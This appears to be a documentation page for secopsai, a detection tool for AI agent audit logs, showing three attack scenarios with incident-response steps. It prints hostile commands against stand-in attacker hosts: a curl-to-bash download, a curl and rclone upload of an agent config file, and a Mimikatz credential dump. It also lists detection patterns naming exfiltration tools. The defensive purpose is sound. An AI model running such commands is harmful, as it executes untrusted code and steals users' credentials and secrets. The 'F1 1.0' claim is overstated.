Skip to content

Example Attack Scenarios

Real examples of attacks detected by secopsai rules.

Example 1: Dangerous Exec (RULE-101)

Attack Scenario

Agent downloads and executes a script from an untrusted source without verification.

What Happened:

# Attacker downloads script from suspicious domain
curl https://attacker-c2.example.com/setup.sh | bash

# The pipe operator (|) passes script directly to bash
# No review of script contents before execution

Why It's Dangerous:

  • ✗ Arbitrary code execution from untrusted source
  • ✗ No integrity verification
  • ✗ No review of script contents
  • ✗ Attacker controls execution context

Detection Details:

{
  "event_id": "evt-042",
  "timestamp": "2026-03-15T14:23:45Z",
  "rule_id": "RULE-101",
  "rule_name": "Dangerous Exec",
  "severity": "CRITICAL",
  "confidence": 1.0,
  "pattern_matched": "curl.*|.*bash",
  "surface": "exec",
  "command": "curl https://attacker-c2.example.com/setup.sh | bash",
  "detection_time_ms": 0.3
}

What to Do:

  1. Immediate Action (0-1 minute)
  2. Interrupt execution if still running
  3. Review curl destination (attacker-c2.example.com)

  4. Check if agent is still responsive

  5. Investigation (1-5 minutes)

  6. Review OpenClaw audit log for lateral movement
  7. Check what commands were executed after this event

  8. Identify who initiated the action

  9. Containment (5-15 minutes)

  10. Isolate the agent if compromise confirmed
  11. Revoke any credentials accessed

  12. Scan for persistence mechanisms

  13. Remediation (ongoing)

  14. Update agent capability restrictions
  15. Require approval for external script execution
  16. Log all curl/wget activities

Prevention:

  • ✓ Only download from trusted sources
  • ✓ Verify script hash before execution
  • ✓ Use package managers (npm, pip, git) instead
  • ✓ Require approval workflows for shell scripts
  • ✓ Scan downloads with antivirus

Example 2: Data Exfiltration (RULE-109)

Attack Scenario

Attacker stages a sensitive configuration file and uploads it to attacker-controlled server.

What Happened:

# Attacker discovers sensitive OpenClaw config
# Stages it as a tar archive
tar czf openclaw-backup.tar.gz ~/.openclaw/openclaw.json

# Uploads archive to attacker server via curl form upload
curl -F "data=@openclaw-backup.tar.gz" https://attacker-storage.example.com/upload

# Or uses rclone to sync to cloud storage
rclone copy ~/.openclaw/openclaw.json attacker-bucket:/stolen-configs/

Why It's Dangerous:

  • ✗ Authentication secrets exposed (API tokens, keys)
  • ✗ Configuration could reveal system architecture
  • ✗ Credentials can be used for lateral movement
  • ✗ Attackers gain persistent access to other systems

Detection Details:

{
  "event_id": "evt-156",
  "timestamp": "2026-03-15T14:45:12Z",
  "rule_id": "RULE-109",
  "rule_name": "Data Exfiltration",
  "severity": "CRITICAL",
  "confidence": 1.0,
  "pattern_matched": "curl.*-F.*@.*|rclone.*copy",
  "surface": "exec",
  "command": "curl -F 'data=@openclaw-backup.tar.gz' https://attacker-storage.example.com/upload",
  "detection_time_ms": 0.2
}

Exfiltration Methods Detected:

  • curl -F @file — HTTP POST form upload
  • wget --post-file — HTTP post upload
  • rclone copy|sync — Cloud storage sync
  • rsync — Remote rsync transfer
  • nc — netcat bidirectional transfer
  • tar|zip && curl — Archive chains
  • Keywords: "exfil", "exfiltration"

What to Do:

  1. Immediate Action (0-1 minute)
  2. Block outbound connections to attacker-storage.example.com
  3. Interrupt agent if exfiltration in progress

  4. Preserve logs before log deletion

  5. Investigation (1-10 minutes)

  6. Identify what was exfiltrated (file hash, size, name)
  7. Trace where data went (attacker-storage.example.com)
  8. Check when exfiltration started

  9. Review surrounding events for reconnaissance

  10. Data Loss Assessment (10-60 minutes)

  11. Determine scope of leaked data
  12. Identify sensitive fields in openclaw.json
  13. Assess risk of credentials being used

  14. Contact legal/compliance if required

  15. Containment (within 1 hour)

  16. Revoke all credentials in exposed config
  17. Reset API tokens and authentication keys
  18. Block attacker infrastructure at network level

  19. Rotate SSH keys and authentication

  20. Remediation (ongoing)

  21. Implement DLP (Data Loss Prevention) rules
  22. Monitor for use of exposed credentials
  23. Require approval for file uploads
  24. Encrypt sensitive config at rest

Prevention:

  • ✓ Restrict outbound connections to approved destinations
  • ✓ Encrypt sensitive configuration data
  • ✓ Monitor and alert on large file transfers
  • ✓ Require approval for curl/rclone/rsync usage
  • ✓ Store secrets in secure vault, not config files

Example 3: Malware Presence (RULE-110)

Attack Scenario

Attacker uses Mimikatz PowerShell module to extract credentials from agent system.

What Happened:

# Attacker uploads Invoke-Mimikatz.ps1 script
curl -O https://attacker-c2/Invoke-Mimikatz.ps1

# Executes Mimikatz via PowerShell to extract credentials
powershell -NoProfile -ExecutionPolicy Bypass -Command "
  . .\Invoke-Mimikatz.ps1
  Invoke-Mimikatz -Command 'sekurlsa::logonpasswords'
"

# Extracts cached credentials from memory
# LSASS process memory dumped
# Plaintext passwords harvested

Why It's Dangerous:

  • ✗ Credential extraction from running system
  • ✗ LSASS process memory access (admin-level)
  • ✗ Plaintext password extraction
  • ✗ Can be used for lateral movement to other systems
  • ✗ Persistent breach if credentials are strong

Detection Details:

{
  "event_id": "evt-789",
  "timestamp": "2026-03-15T15:30:22Z",
  "rule_id": "RULE-110",
  "rule_name": "Malware Presence",
  "severity": "CRITICAL",
  "confidence": 1.0,
  "pattern_matched": "Invoke-Mimikatz|sekurlsa::logonpasswords",
  "surface": "exec",
  "command": "powershell -Command ... Invoke-Mimikatz ... sekurlsa::logonpasswords",
  "detection_time_ms": 0.1
}

Malware Signatures Detected:

  • Mimikatz — Credential dumping tool
  • Cobalt Strike — C2 framework
  • Metasploit — Exploitation framework
  • xmrig — Cryptocurrency miner
  • Ransomware families — Encryption/extortion
  • RATs — Remote Access Trojans (njrat, quasar, darkcomet, remcos)
  • PowerShell patterns — Invoke-Mimikatz, sekurlsa::logonpasswords

What to Do:

  1. IMMEDIATE Action (0-5 minutes)
  2. Air-gap the system (disconnect from network)
  3. Preserve full memory dump (for forensics)
  4. Do NOT restart (could clear memory evidence)

  5. Alert SOC and incident response immediately

  6. Forensic Preservation (5-30 minutes)

  7. Capture full system memory dump
  8. Preserve hard drive image
  9. Export OpenClaw audit logs
  10. Preserve Windows Event logs

  11. Document timeline of events

  12. Scope Assessment (30-60 minutes)

  13. Determine malware variant (Mimikatz version, etc)
  14. Identify command and control server
  15. List extracted credentials
  16. Check for lateral movement attempts

  17. Review for data exfiltration

  18. Containment (within 1 hour)

  19. Revoke all credentials that may be exposed
  20. Reset passwords for all accounts
  21. Block C2 infrastructure at perimeter
  22. Isolate other potentially compromised systems

  23. Prepare for rebuild/reimaging

  24. Eradication (ongoing)

  25. Remove malware from system (if recoverable)
  26. Or rebuild system from trusted backup
  27. Update all credentials to new values
  28. Patch vulnerabilities that allowed access

  29. Deploy EDR/antivirus detection

  30. Recovery (ongoing)

  31. Monitor for credential reuse
  32. Hunt for lateral movement
  33. Forensic analysis of incident
  34. Implement additional controls

Prevention:

  • ✓ Restrict PowerShell execution (AppLocker)
  • ✓ Block PowerShell scripts without digital signature
  • ✓ Monitor LSASS memory access
  • ✓ Require approval for credential access tools
  • ✓ Deploy EDR (Endpoint Detection & Response)
  • ✓ Keep systems patched and updated
  • ✓ Restrict admin access
  • ✓ Enable credential guard (Windows)

How These Attacks Were Detected

Detection Pipeline

1. Event Generated
2. Normalized to openclaw-audit-v1 schema
3. Matched against 12 rules in parallel
4. RULE-101/RULE-109/RULE-110 trigger
5. Detection logged with confidence 1.0
6. Findings report generated
7. Severity: CRITICAL
8. Remediation guidance provided

Why F1 1.0?

These attacks were:

  • ✓ Clearly malicious (high confidence patterns)
  • ✓ Unique signatures (not benign behavior)
  • ✓ Well-tested rules (no false positives)
  • ✓ Real attack scenarios (realistic patterns)
  • ✓ Reproducible detections (deterministic)

More Examples

These three examples represent the breadth of detection:

  • RULE-101: Command execution attacks
  • RULE-109: Data loss/exfiltration attacks
  • RULE-110: Malware/adversary tools

See Rules Registry for:

  • RULE-102: Sensitive Config Changes
  • RULE-103: Skill Source Drift (supply chain)
  • RULE-104: Policy Denial Churn (brute force)
  • RULE-105: Tool Burst (reconnaissance)
  • RULE-106: Pairing Churn (auth bypass)
  • RULE-107: Subagent Fanout (lateral movement)
  • RULE-108: Restart Loop (sabotage)

Next: Rules Registry for complete rule reference, or Deployment Guide to put into production.